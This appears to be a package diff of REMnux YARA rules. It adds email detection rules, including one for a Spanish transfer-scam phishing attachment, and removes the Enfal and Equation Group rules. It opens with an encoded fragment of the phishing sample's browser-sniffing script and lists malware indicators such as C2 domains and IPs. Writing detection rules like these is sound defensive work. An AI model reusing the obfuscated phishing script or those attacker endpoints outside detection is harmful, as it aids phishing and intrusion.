+NjElNjMlMjIlMjklMjElM0QlMkQlMzElM0IlNzYlNjElNzIlMjAlNjklNzMlNUYlNjclNkIlM0Ql
+NjElNjclNzQlMkUlNjklNkUlNjQlNjUlNzglNEYlNjYlMjglMjIlNjclNjUlNjMlNkIlNkYlMjIl
+MjklMjElM0QlMkQlMzElM0IlNzYlNjElNzIlMjAlNjklNzMlNUYlNzMlNjYlM0QlNjElNjclNzQl
+MkUlNjklNkUlNjQlNjUlNzglNEYlNjYlMjglMjIlNzMlNjElNjYlNjElNzIlNjklMjIlMjklMjEl
+M0QlMkQlMzElM0IlNjklNjYlMjglNjklNzMlNUYlNjklNjUlMjYlMjYlMjElNjklNzMlNUYlNkYl
+NzAlMjYlMjYlMjElNjklNzMlNUYlNkQlNjElNjMlMjklN0IlNjklNjYlMjglNjElNjclNzQlMkUl
+NjklNkUlNjQlNjUlNzglNEYlNjYlMjglMjIlNzAlNjElNkMlNkQlNzMlNkYlNzUlNzIlNjMlNjUl
+MjIlMjklMjElM0QlMEElMkQlMzElN0MlN0MlNjElNjclNzQlMkUlNjklNkUlNjQlNjUlNzglNEYl
+NjYlMjglMjIlNzIlNjUlNjclNkIlNjklNkUlNjclMjIlMjklMjElM0QlMkQlMzElN0MlN0MlNjEl
+NjclNzQlMkUlNjklNkUlNjQlNjUlNzglNEYlNjYlMjglMjIlNzclNjklNkUlNjQlNkYlNzclNzMl
+MjAlNjMlNjUlMjIlMjklMjElM0QlMkQlMzElN0MlN0MlNjElNjclNzQlMkUlNjklNkUlNjQlNjUl
+NzglNEYlNjYlMjglMjIlNkElMzIlNkQlNjUlMjIlMjklMjElM0QlMkQlMzElN0MlN0MlNjElNjcl
+NzQlMkUlNjklNkUlNjQlNjUlNzglNEYlNjYlMjglMjIlNjElNzYlNjElNkUlNzQlNjclNkYlMjIl
+MjklMjElM0QlMkQlMzElN0MlN0MlNjElNjclNzQlMkUlNjklNkUlNjQlNjUlNzglNEYlNjYlMjgl
+MjIlMjAlNzMlNzQlNjIlMjIlMjklMjElM0QlMkQlMzElMjklMEElMEElNzIlNjUlNzQlNzUlNzIl
+NkUlMjAlNjYlNjElNkMlNzMlNjUlM0IlNzYlNjElNzIlMjAlNzYlM0QlNDIlNzIlNkYlNzclNzMl
+NjUlNzIlNTMlNzUlNzAlNzAlNkYlNzIlNzQlNUYlMkUlNDclNjUlNzQlNDYlNkYlNkMlNkMlNkYl
+NzclNjklNkUlNjclNDYlNkMlNkYlNjElNzQlMjglNjElNjclNzQlMkMlMjIlNkQlNzMlNjklNjUl
+MjAlMjIlMjklM0IlNjklNjYlMjglNzYlMjElM0QlNkUlNzUlNkMlNkMlMjklNzIlNjUlNzQlNzUl
+NzIlNkUlMjAlNzYlM0UlM0QlMzUlMkUlMzUlN0QlNjklNjYlMjglNjklNzMlNUYlNjclNkIlMjYl
+MjYlMjElNjklNzMlNUYlNzMlNjYlMjklN0IlNzYlNjElNzIlMjAlMEElMEElNzYlM0QlNDIlNzIl
+NkYlNzclNzMlNjUlNzIlNTMlNzUlNzAlNzAlNkYlNzIlNzQlNUYlMkUlNDclNjUlNzQlNDYlNkYl
+NkMlNkMlNkYlNzclNjklNkUlNjclNDYlNkMlNkYlNjElNzQlMjglNjElNjclNzQlMkMlMjIlNzIl
+NzYlM0ElMjIlMjklM0IlNjklNjYlMjglNzYlMjElM0QlNkUlNzUlNkMlNkMlMjklNzIlNjUlNzQl
+NzUlNzIlNkUlMjAlNzYlM0UlM0QlMzElMkUlMzQlM0IlNjUlNkMlNzMlNjUlN0IlNzYlM0QlNDIl
+NzIlNkYlNzclNzMlNjUlNzIlNTMlNzUlNzAlNzAlNkYlNzIlNzQlNUYlMkUlNDclNjUlNzQlNDYl
+NkYlNkMlNkMlNkYlNzclNjklNkUlNjclNDYlNkMlNkYlNjElNzQlMjglNjElNjclNzQlMkMlMjIl
+NjclNjElNkMlNjUlNkYlNkUlMkYlMjIlMjklM0IlNjklNjYlMjglNzYlMjElM0QlNkUlNzUlNkMl
+NkMlMjklMEElMEElNzIlNjUlNzQlNzUlNzIlNkUlMjAlNzYlM0UlM0QlMEElMzElMkUlMzMlN0Ql
+N0QlNjklNjYlMjglNjklNzMlNUYlNzMlNjYlMjklN0IlNjklNjYlMjglNjElNjclNzQlMkUlNjkl
+NkUlNjQlNjUlNzglNEYlNjYlMjglMjIlNzIlNzYlM0ElMzMlMkUlMzElMzQlMkUlMzElMzUlMkUl
+MzklMzIlMkUlMzYlMzUlMjIlMjklMjElM0QlMkQlMzElMjklNzIlNjUlNzQlNzUlNzIlNkUlMjAl
+NjYlNjElNkMlNzMlNjUlM0IlNzYlNjElNzIlMjAlNzYlM0QlNDIlNzIlNkYlNzclNzMlNjUlNzIl
+NTMlNzUlNzAlNzAlNkYlNzIlNzQlNUYlMkUlNDclNjUlNzQlNDYlNkYlNkMlNkMlNkYlNzclNjkl
+NkUlNjclNDYlNkMlNkYlNjElNzQlMjglNjElNjclNzQlMkMlMjIlNjElNzAlNzAlNkMlNjUlNzcl
+NjUlNjIlNkIlNjklNzQlMkYlMjIlMjklM0IlNjklNjYlMjglNzYlMjElM0QlNkUlNzUlNkMlNkMl
+MjklMEElMEElNzIlNjUlNzQlNzUlNzIlNkUlMjAlNzYlM0UlM0QlMzMlMzElMzIlN0QlNjklNjYl
+MjglNjklNzMlNUYlNkYlNzAlMjklN0IlNjklNjYlMjglNjElNjclNzQlMkUlNjklNkUlNjQlNjUl
+NzglNEYlNjYlMjglMjIlNzMlNkYlNkUlNzklMkYlNjMlNkYlNkQlMzElMjIlMjklMjElM0QlMkQl
+MzElMjklNzIlNjUlNzQlNzUlNzIlNkUlMjAlNjYlNjElNkMlNzMlNjUlM0IlNzYlNjElNzIlMjAl
+NzYlM0QlNDIlNzIlNkYlNzclNzMlNjUlNzIlNTMlNzUlNzAlNzAlNkYlNzIlNzQlNUYlMkUlNDcl
+NjUlNzQlNDYlNkYlNkMlNkMlNkYlNzclNjklNkUlNjclNDYlNkMlNkYlNjElNzQlMjglNjElNjcl
+NzQlMkMlMjIlNkYlNzAlNjUlNzIlNjElMjAlMjIlMjklM0IlNjklNjYlMjglNzYlM0QlM0QlNkUl
+NzUlNkMlNkMlMjklMEElMEElNzYlM0QlNDIlNzIlNkYlNzclNzMlNjUlNzIlNTMlNzUlNzAlNzAl
+NkYlNzIlNzQlNUYlMkUlNDclNjUlNzQlNDYlNkYlNkMlNkMlNkYlNzclNjklNkUlNjclNDYlNkMl
+NkYlNjElNzQlMjglNjElNjclNzQlMkMlMjIlNkYlNzAlNjUlNzIlNjElMkYlMjIlMjklM0IlNjkl
+NjYlMjglNzYlMjElM0QlNkUlNzUlNkMlNkMlMjklNzIlNjUlNzQlNzUlNzIlNkUlMjAlNzYlM0Ul
+M0QlMzglN0QlNjklNjYlMjglNjElNjclNzQlMkUlNjklNkUlNjQlNjUlNzglNEYlNjYlMjglMjIl
+NzAlNjQlNjElM0IlMjAlNzMlNkYlNkUlNzklMkYlNjMlNkYlNkQlMzIlMjIlMjklMjElM0QlMkQl
+MzElMjklNzIlNjUlNzQlNzUlNzIlNkUlMjAlNzQlNzIlNzUlNjUlM0IlNzIlNjUlNzQlNzUlNzIl
+NkUlMjAlNjYlNjElNkMlNzMlNjUlN0QlMkMlMEElNDclNjUlNzQlNDYlNkYlNkMlNkMlNkYlNzcl
+NjklNkUlNjclNDYlNkMlNkYlNjElNzQlM0ElNjYlNzUlNkUlNjMlNzQlNjklNkYlNkUlMjglNzMl
+NzQlNzIlMkMlNzAlNjYlNzglMjklN0IlNzYlNjElNzIlMjAlNjklM0QlNzMlNzQlNzIlMkUlNjkl
+NkUlNjQlNjUlNzglNEYlNjYlMjglNzAlNjYlNzglMjklM0IlNjklNjYlMjglNjklMjElM0QlMkQl
+MzElMjklN0IlNzYlNjElNzIlMjAlNzYlM0QlNzAlNjElNzIlNzMlNjUlNDYlNkMlNkYlNjElNzQl
+MjglNzMlNzQlNzIlMkUlNzMlNzUlNjIlNzMlNzQlNzIlNjklNkUlNjclMjglNjklMkIlNzAlNjYl
+NzglMkUlNkMlNjUlNkUlNjclNzQlNjglMjklMjklM0IlNjklNjYlMjglMjElNjklNzMlNEUlNjEl
+NEUlMjglNzYlMjklMjklNzIlNjUlNzQlNzUlNzIlNkUlMjAlNzYlN0QlMEElMEElNzIlNjUlNzQl
+NzUlNzIlNkUlMjAlNkUlNzUlNkMlNkMlN0QlN0QlM0IlNzYlNjElNzIlMjAlNjklNzMlNUYlNjIl
+NzIlNkYlNzclNzMlNjUlNzIlNUYlNzMlNzUlNzAlNzAlNkYlNzIlNzQlNjUlNjQlM0QlNDIlNzIl
+NkYlNzclNzMlNjUlNzIlNTMlNzUlNzAlNzAlNkYlNzIlNzQlNUYlMkUlNDklNzMlNDIlNzIlNkYl
+NzclNzMlNjUlNzIlNTMlNzUlNzAlNzAlNkYlNzIlNzQlNjUlNjQlMjglMjklMEElMjAlMjAlM0Ml
+MkYlNzMlNjMlNzIlNjklNzAlNzQlM0UlMEElMjAlMjAlM0MlMkYlNjIlNkYlNjQlNzklM0UlMEEl
+M0MlMkYlNjglNzQlNkQlNkMlM0UlMEEnKSk8L3NjcmlwdD4NCg==
+--001a11c33e224dfc37052a242883--
diff -Nru remnux-rules-0.0.3/yara/email/image.yar remnux-rules-0.0.4/yara/email/image.yar
--- remnux-rules-0.0.3/yara/email/image.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/email/image.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,30 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and 
+    open to any user or organization, as long as you use it under this license.
+*/
+
+rule with_images : mail {
+	meta:
+		author = "Antonio Sanchez <asanchez@hispasec.com>"
+		reference = "http://laboratorio.blogs.hispasec.com/"
+		description = "Rule to detect the presence of an or several images"
+	strings:
+		$a = ".jpg" nocase
+		$b = ".png" nocase
+		$c = ".bmp" nocase
+	condition:
+		any of them
+}
+
+rule without_images : mail {
+	meta:
+		author = "Antonio Sanchez <asanchez@hispasec.com>"
+		reference = "http://laboratorio.blogs.hispasec.com/"
+		description = "Rule to detect the no presence of any image"
+	strings:
+		$a = ".jpg" nocase
+		$b = ".png" nocase
+		$c = ".bmp" nocase
+	condition:
+		not $a and not $b and not $c
+}
diff -Nru remnux-rules-0.0.3/yara/email/scam.yar remnux-rules-0.0.4/yara/email/scam.yar
--- remnux-rules-0.0.3/yara/email/scam.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/email/scam.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,35 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as
+    long as you use it under this license.
+*/
+
+rule content : mail {
+	meta:
+		author = "A.Sanchez <asanchez@koodous.com>"
+		description = "Detects scam emails with phishing attachment."
+		test1 = "email/eml/transferencia1.eml"
+		test2 = "email/eml/transferencia2.eml"
+
+	strings:
+		$subject = "Asunto: Justificante de transferencia" nocase
+		$body = "Adjunto justificante de transferencia"
+	condition:
+		all of them
+}
+
+rule attachment : mail {
+	meta:
+		author = "A.Sanchez <asanchez@koodous.com>"
+		description = "Detects scam emails with phishing attachment."
+		test1 = "email/eml/transferencia1.eml"
+		test2 = "email/eml/transferencia2.eml"
+
+	strings:
+		$filename = "filename=\"scan001.pdf.html\""
+		$pleaseEnter = "NTAlNkMlNjUlNjElNzMlNjUlMjAlNjUlNkUlNzQlNjUlNzIlMjAlN" // Please enter 
+		$emailReq = "NkQlNjUlNkUlNzQlMkUlNjklNkUlNjQlNjUlNzglMzIlMkUlNDUlNkQlNjElNjklNkMlM0I" // ment.index2.Email;
+		$pAssign = "NzAlMjAlM0QlMjAlNjQlNkYlNjMlNzUlNkQlNjUlNkUlNzQlMkUlNjklNkUlNjQlNjUl" // p = document.inde
+		
+	condition:
+		all of them
+}
diff -Nru remnux-rules-0.0.3/yara/email/urls.yar remnux-rules-0.0.4/yara/email/urls.yar
--- remnux-rules-0.0.3/yara/email/urls.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/email/urls.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,26 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and 
+    open to any user or organization, as long as you use it under this license.
+*/
+
+rule with_urls : mail {
+	meta:
+		author = "Antonio Sanchez <asanchez@hispasec.com>"
+		reference = "http://laboratorio.blogs.hispasec.com/"
+		description = "Rule to detect the presence of an or several urls"
+	strings:
+		$url_regex = /https?:\/\/([\w\.-]+)([\/\w \.-]*)/
+	condition:
+		all of them
+}
+
+rule without_urls : mail {
+	meta:
+		author = "Antonio Sanchez <asanchez@hispasec.com>"
+		reference = "http://laboratorio.blogs.hispasec.com/"
+		description = "Rule to detect the no presence of any url"
+	strings:
+		$url_regex = /https?:\/\/([\w\.-]+)([\/\w \.-]*)/
+	condition:
+		not $url_regex
+}
diff -Nru remnux-rules-0.0.3/yara/Enfal.yara remnux-rules-0.0.4/yara/Enfal.yara
--- remnux-rules-0.0.3/yara/Enfal.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Enfal.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,132 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule EnfalCode : Enfal Family 
-{
-    meta:
-        description = "Enfal code tricks"
-        author = "Seth Hardy"
-        last_modified = "2014-06-19"
-        
-    strings:
-        // mov al, 20h; sub al, bl; add [ebx+esi], al; push esi; inc ebx; call edi; cmp ebx, eax
-        $decrypt = { B0 20 2A C3 00 04 33 56 43 FF D7 3B D8 }
-        
-    condition:
-        any of them
-}
-
-rule EnfalStrings : Enfal Family
-{
-    meta:
-        description = "Enfal Identifying Strings"
-        author = "Seth Hardy"
-        last_modified = "2014-06-19"
-        
-    strings:
-        $ = "D:\\work\\\xe6\xba\x90\xe5\x93\xa5\xe5\x85\x8d\xe6\x9d\x80\\tmp\\Release\\ServiceDll.pdb"
-        $ = "e:\\programs\\LuridDownLoader"
-        $ = "LuridDownloader for Falcon"
-        $ = "DllServiceTrojan"
-        $ = "\\k\\\xe6\xa1\x8c\xe8\x9d\xa2\\"
-        $ = "EtenFalcon\xef\xbc\x88\xe4\xbf\xae\xe6\x94\xb9\xef\xbc\x89"
-        $ = "Madonna\x00Jesus"
-        $ = "/iupw82/netstate"
-        $ = "fuckNodAgain"
-        $ = "iloudermao"
-        $ = "Crpq2.cgi"
-        $ = "Clnpp5.cgi"
-        $ = "Dqpq3ll.cgi"
-        $ = "dieosn83.cgi"
-        $ = "Rwpq1.cgi"
-        $ = "/Ccmwhite"
-        $ = "/Cmwhite"
-        $ = "/Crpwhite"
-        $ = "/Dfwhite"
-        $ = "/Query.txt"
-        $ = "/Ufwhite"
-        $ = "/cgl-bin/Clnpp5.cgi"
-        $ = "/cgl-bin/Crpq2.cgi"
-        $ = "/cgl-bin/Dwpq3ll.cgi"
-        $ = "/cgl-bin/Owpq4.cgi"
-        $ = "/cgl-bin/Rwpq1.cgi"
-        $ = "/trandocs/mm/"
-        $ = "/trandocs/netstat"
-        $ = "NFal.exe"
-        $ = "LINLINVMAN"
-        $ = "7NFP4R9W"
-        
-    condition:
-        any of them
-}
-
-rule Enfal : Family
-{
-    meta:
-        description = "Enfal"
-        author = "Seth Hardy"
-        last_modified = "2014-06-19"
-        
-    condition:
-        EnfalCode or EnfalStrings
-}
-
-
-rule Enfal_Malware {
-	meta:
-		description = "Detects a certain type of Enfal Malware"
-		author = "Florian Roth"
-		reference = "not set"
-		date = "2015/02/10"
-		hash = "9639ec9aca4011b2724d8e7ddd13db19913e3e16"
-		score = 60
-	strings:
-		$s0 = "POWERPNT.exe" fullword ascii
-		$s1 = "%APPDATA%\\Microsoft\\Windows\\" fullword ascii
-		$s2 = "%HOMEPATH%" fullword ascii
-		$s3 = "Server2008" fullword ascii
-		$s4 = "Server2003" fullword ascii
-		$s5 = "Server2003R2" fullword ascii
-		$s6 = "Server2008R2" fullword ascii
-		$s9 = "%HOMEDRIVE%" fullword ascii
-		$s13 = "%ComSpec%" fullword ascii
-	condition:
-		all of them
-}
-
-rule Enfal_Malware_Backdoor {
-	meta:
-		description = "Generic Rule to detect the Enfal Malware"
-		author = "Florian Roth"
-		date = "2015/02/10"
-		super_rule = 1
-		hash0 = "6d484daba3927fc0744b1bbd7981a56ebef95790"
-		hash1 = "d4071272cc1bf944e3867db299b3f5dce126f82b"
-		hash2 = "6c7c8b804cc76e2c208c6e3b6453cb134d01fa41"
-		score = 60
-	strings:
-		$mz = { 4d 5a }
-			
-		$x1 = "Micorsoft Corportation" fullword wide
-		$x2 = "IM Monnitor Service" fullword wide
-		
-		$s1 = "imemonsvc.dll" fullword wide
-		$s2 = "iphlpsvc.tmp" fullword
-		
-		$z1 = "urlmon" fullword
-		$z2 = "Registered trademarks and service marks are the property of their respec" wide		
-		$z3 = "XpsUnregisterServer" fullword
-		$z4 = "XpsRegisterServer" fullword
-		$z5 = "{53A4988C-F91F-4054-9076-220AC5EC03F3}" fullword
-	condition:
-		( $mz at 0 ) and 
-		( 
-			1 of ($x*) or 
-			( all of ($s*) and all of ($z*) )
-		)
-}
-
diff -Nru remnux-rules-0.0.3/yara/Equation.yara remnux-rules-0.0.4/yara/Equation.yara
--- remnux-rules-0.0.3/yara/Equation.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Equation.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,573 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-
-
-
-/* Equation APT ------------------------------------------------------------ */
-
-rule apt_equation_exploitlib_mutexes {
-    meta:
-        copyright = "Kaspersky Lab"
-        description = "Rule to detect Equation group's Exploitation library http://goo.gl/ivt8EW"
-        version = "1.0"
-        last_modified = "2015-02-16"
-        reference = "http://securelist.com/blog/research/68750/equation-the-death-star-of-malware-galaxy/"
-    strings:
-        $mz="MZ"
-        $a1="prkMtx" wide
-        $a2="cnFormSyncExFBC" wide
-        $a3="cnFormVoidFBC" wide
-        $a4="cnFormSyncExFBC"
-        $a5="cnFormVoidFBC"
-    condition:
-        (($mz at 0) and any of ($a*))
-}
-
-rule apt_equation_doublefantasy_genericresource {
-    meta:
-        copyright = "Kaspersky Lab"
-        description = "Rule to detect DoubleFantasy encoded config http://goo.gl/ivt8EW"
-        version = "1.0"
-        last_modified = "2015-02-16"
-        reference = "http://securelist.com/blog/research/68750/equation-the-death-star-of-malware-galaxy/"
-    strings:
-        $mz="MZ"
-        $a1={06 00 42 00 49 00 4E 00 52 00 45 00 53 00}
-        $a2="yyyyyyyyyyyyyyyy"
-        $a3="002"
-    condition:
-        (($mz at 0) and all of ($a*)) and filesize < 500000
-}
-
-rule apt_equation_equationlaser_runtimeclasses {
-	meta:
-	    copyright = "Kaspersky Lab"
-	    description = "Rule to detect the EquationLaser malware"
-	    version = "1.0"
-	    last_modified = "2015-02-16"
-	    reference = "https://securelist.com/blog/"
-	strings:
-	    $a1="?a73957838_2@@YAXXZ"
-	    $a2="?a84884@@YAXXZ"
-	    $a3="?b823838_9839@@YAXXZ"
-	    $a4="?e747383_94@@YAXXZ"
-	    $a5="?e83834@@YAXXZ"
-	    $a6="?e929348_827@@YAXXZ"
-	condition:
-	    any of them
-}
-
-rule apt_equation_cryptotable {
-	meta:
-	    copyright = "Kaspersky Lab"
-	    description = "Rule to detect the crypto library used in Equation group malware"
-	    version = "1.0"
-	    last_modified = "2015-02-16"
-	    reference = "https://securelist.com/blog/"
-	strings:
-	    $a={37 DF E8 B6 C7 9C 0B AE 91 EF F0 3B 90 C6 80 85 5D 19 4B 45 44 12 3C E2 0D 5C 1C 7B C4 FF D6 05 17 14 4F 03 74 1E 41 DA 8F 7D DE 7E 99 F1 35 AC B8 46 93 CE 23 82 07 EB 2B D4 72 71 40 F3 B0 F7 78 D7 4C D1 55 1A 39 83 18 FA E1 9A 56 B1 96 AB A6 30 C5 5F BE 0C 50 C1}
-	condition:
-	    $a
-}
-
-/* Equation Group - Kaspersky ---------------------------------------------- */
-
-rule Equation_Kaspersky_TripleFantasy_1 {
-	meta:
-		description = "Equation Group Malware - TripleFantasy http://goo.gl/ivt8EW"
-		author = "Florian Roth"
-		reference = "http://goo.gl/ivt8EW"
-		date = "2015/02/16"
-		hash = "b2b2cd9ca6f5864ef2ac6382b7b6374a9fb2cbe9"
-	strings:
-		$mz = { 4d 5a }
-
-		$s0 = "%SystemRoot%\\system32\\hnetcfg.dll" fullword wide
-		$s1 = "%WINDIR%\\System32\\ahlhcib.dll" fullword wide
-		$s2 = "%WINDIR%\\sjyntmv.dat" fullword wide
-		$s3 = "Global\\{8c38e4f3-591f-91cf-06a6-67b84d8a0102}" fullword wide
-		$s4 = "%WINDIR%\\System32\\owrwbsdi" fullword wide
-		$s5 = "Chrome" fullword wide
-		$s6 = "StringIndex" fullword ascii
-
-		$x1 = "itemagic.net@443" fullword wide
-		$x2 = "team4heat.net@443" fullword wide
-		$x5 = "62.216.152.69@443" fullword wide
-		$x6 = "84.233.205.37@443" fullword wide
-
-		$z1 = "www.microsoft.com@80" fullword wide
-		$z2 = "www.google.com@80" fullword wide
-		$z3 = "127.0.0.1:3128" fullword wide
-	condition:
-		( $mz at 0 ) and filesize < 300000 and
-		(
-			( all of ($s*) and all of ($z*) ) or
-			( all of ($s*) and 1 of ($x*) )
-		)
-}
-
-rule Equation_Kaspersky_DoubleFantasy_1 {
-	meta:
-		description = "Equation Group Malware - DoubleFantasy"
-		author = "Florian Roth"
-		reference = "http://goo.gl/ivt8EW"
-		date = "2015/02/16"
-		hash = "d09b4b6d3244ac382049736ca98d7de0c6787fa2"
-	strings:
-		$mz = { 4d 5a }
-
-		$z1 = "msvcp5%d.dll" fullword ascii
-
-		$s0 = "actxprxy.GetProxyDllInfo" fullword ascii
-		$s3 = "actxprxy.DllGetClassObject" fullword ascii
-		$s5 = "actxprxy.DllRegisterServer" fullword ascii
-		$s6 = "actxprxy.DllUnregisterServer" fullword ascii
-
-		$x1 = "yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy" ascii
-		$x2 = "191H1a1" fullword ascii
-		$x3 = "November " fullword ascii
-		$x4 = "abababababab" fullword ascii
-		$x5 = "January " fullword ascii
-		$x6 = "October " fullword ascii
-		$x7 = "September " fullword ascii
-	condition:
-		( $mz at 0 ) and filesize < 350000 and
-		(
-			( $z1 ) or
-			( all of ($s*) and 6 of ($x*) )
-		)
-}
-
-rule Equation_Kaspersky_GROK_Keylogger {
-	meta:
-		description = "Equation Group Malware - GROK keylogger"
-		author = "Florian Roth"
-		reference = "http://goo.gl/ivt8EW"
-		date = "2015/02/16"
-		hash = "50b8f125ed33233a545a1aac3c9d4bb6aa34b48f"
-	strings:
-		$mz = { 4d 5a }
-		$s0 = "c:\\users\\rmgree5\\" ascii
-		$s1 = "msrtdv.sys" fullword wide
-
-		$x1 = "svrg.pdb" fullword ascii
-		$x2 = "W32pServiceTable" fullword ascii
-		$x3 = "In forma" fullword ascii
-		$x4 = "ReleaseF" fullword ascii
-		$x5 = "criptor" fullword ascii
-		$x6 = "astMutex" fullword ascii
-		$x7 = "ARASATAU" fullword ascii
-		$x8 = "R0omp4ar" fullword ascii
-
-		$z1 = "H.text" fullword ascii
-		$z2 = "\\registry\\machine\\software\\Microsoft\\Windows NT\\CurrentVersion" fullword wide
-		$z4 = "\\registry\\machine\\SYSTEM\\ControlSet001\\Control\\Session Manager\\Environment" wide fullword
-	condition:
-		( $mz at 0 ) and filesize < 250000 and
-		(
-			$s0 or
-			( $s1 and 6 of ($x*) ) or
-			( 6 of ($x*) and all of ($z*) )
-		)
-}
-
-rule Equation_Kaspersky_GreyFishInstaller {
-	meta:
-		description = "Equation Group Malware - Grey Fish"
-		author = "Florian Roth"
-		reference = "http://goo.gl/ivt8EW"
-		date = "2015/02/16"
-		hash = "58d15d1581f32f36542f3e9fb4b1fc84d2a6ba35"
-	strings:
-		$s0 = "DOGROUND.exe" fullword wide
-		$s1 = "Windows Configuration Services" fullword wide
-		$s2 = "GetMappedFilenameW" fullword ascii
-	condition:
-		all of them
-}
-
-rule Equation_Kaspersky_EquationDrugInstaller {
-	meta:
-		description = "Equation Group Malware - EquationDrug installer LUTEUSOBSTOS"
-		author = "Florian Roth"
-		reference = "http://goo.gl/ivt8EW"
-		date = "2015/02/16"
-		hash = "61fab1b8451275c7fd580895d9c68e152ff46417"
-	strings:
-		$mz = { 4d 5a }
-
-		$s0 = "\\system32\\win32k.sys" fullword wide
-		$s1 = "ALL_FIREWALLS" fullword ascii
-
-		$x1 = "@prkMtx" fullword wide
-		$x2 = "STATIC" fullword wide
-		$x3 = "windir" fullword wide
-		$x4 = "cnFormVoidFBC" fullword wide
-		$x5 = "CcnFormSyncExFBC" fullword wide
-		$x6 = "WinStaObj" fullword wide
-		$x7 = "BINRES" fullword wide
-	condition:
-		( $mz at 0 ) and filesize < 500000 and all of ($s*) and 5 of ($x*)
-}
-
-rule Equation_Kaspersky_EquationLaserInstaller {
-	meta:
-		description = "Equation Group Malware - EquationLaser Installer"
-		author = "Florian Roth"
-		reference = "http://goo.gl/ivt8EW"
-		date = "2015/02/16"
-		hash = "5e1f56c1e57fbff96d4999db1fd6dd0f7d8221df"
-	strings:
-		$mz = { 4d 5a }
-		$s0 = "Failed to get Windows version" fullword ascii
-		$s1 = "lsasrv32.dll and lsass.exe" fullword wide
-		$s2 = "\\\\%s\\mailslot\\%s" fullword ascii
-		$s3 = "%d-%d-%d %d:%d:%d Z" fullword ascii
-		$s4 = "lsasrv32.dll" fullword ascii
-		$s5 = "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" fullword ascii
-		$s6 = "%s %02x %s" fullword ascii
-		$s7 = "VIEWERS" fullword ascii
-		$s8 = "5.2.3790.220 (srv03_gdr.040918-1552)" fullword wide
-	condition:
-		( $mz at 0 ) and filesize < 250000 and 6 of ($s*)
-}
-
-rule Equation_Kaspersky_FannyWorm {
-	meta:
-		description = "Equation Group Malware - Fanny Worm"
-		author = "Florian Roth"
-		reference = "http://goo.gl/ivt8EW"
-		date = "2015/02/16"
-		hash = "1f0ae54ac3f10d533013f74f48849de4e65817a7"
-	strings:
-		$mz = { 4d 5a }
-
-		$s1 = "x:\\fanny.bmp" fullword ascii
-		$s2 = "32.exe" fullword ascii
-		$s3 = "d:\\fanny.bmp" fullword ascii
-
-		$x1 = "c:\\windows\\system32\\kernel32.dll" fullword ascii
-		$x2 = "System\\CurrentControlSet\\Services\\USBSTOR\\Enum" fullword ascii
-		$x3 = "System\\CurrentControlSet\\Services\\PartMgr\\Enum" fullword ascii
-		$x4 = "\\system32\\win32k.sys" fullword wide
-		$x5 = "\\AGENTCPD.DLL" fullword ascii
-		$x6 = "agentcpd.dll" fullword ascii
-		$x7 = "PADupdate.exe" fullword ascii
-		$x8 = "dll_installer.dll" fullword ascii
-		$x9 = "\\restore\\" fullword ascii
-		$x10 = "Q:\\__?__.lnk" fullword ascii
-		$x11 = "Software\\Microsoft\\MSNetMng" fullword ascii
-		$x12 = "\\shelldoc.dll" fullword ascii
-		$x13 = "file size = %d bytes" fullword ascii
-		$x14 = "\\MSAgent" fullword ascii
-		$x15 = "Global\\RPCMutex" fullword ascii
-		$x16 = "Global\\DirectMarketing" fullword ascii
-	condition:
-		( $mz at 0 ) and filesize < 300000 and
-		(
-			( 2 of ($s*) ) or
-			( 1 of ($s*) and 6 of ($x*) ) or
-			( 14 of ($x*) )
-		)
-}
-
-rule Equation_Kaspersky_HDD_reprogramming_module {
-	meta:
-		description = "Equation Group Malware - HDD reprogramming module"
-		author = "Florian Roth"
-		reference = "http://goo.gl/ivt8EW"
-		date = "2015/02/16"
-		hash = "ff2b50f371eb26f22eb8a2118e9ab0e015081500"
-	strings:
-		$mz = { 4d 5a }
-		$s0 = "nls_933w.dll" fullword ascii
-
-		$s1 = "BINARY" fullword wide
-		$s2 = "KfAcquireSpinLock" fullword ascii
-		$s3 = "HAL.dll" fullword ascii
-		$s4 = "READ_REGISTER_UCHAR" fullword ascii
-	condition:
-		( $mz at 0 ) and filesize < 300000 and all of ($s*)
-}
-
-rule Equation_Kaspersky_EOP_Package {
-	meta:
-		description = "Equation Group Malware - EoP package and malware launcher"
-		author = "Florian Roth"
-		reference = "http://goo.gl/ivt8EW"
-		date = "2015/02/16"
-		hash = "2bd1b1f5b4384ce802d5d32d8c8fd3d1dc04b962"
-	strings:
-		$mz = { 4d 5a }
-		$s0 = "abababababab" fullword ascii
-		$s1 = "abcdefghijklmnopq" fullword ascii
-		$s2 = "@STATIC" fullword wide
-		$s3 = "$aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" fullword ascii
-		$s4 = "@prkMtx" fullword wide
-		$s5 = "prkMtx" fullword wide
-		$s6 = "cnFormVoidFBC" fullword wide
-	condition:
-		( $mz at 0 ) and filesize < 100000 and all of ($s*)
-}
-
-rule Equation_Kaspersky_TripleFantasy_Loader {
-	meta:
-		description = "Equation Group Malware - TripleFantasy Loader"
-		author = "Florian Roth"
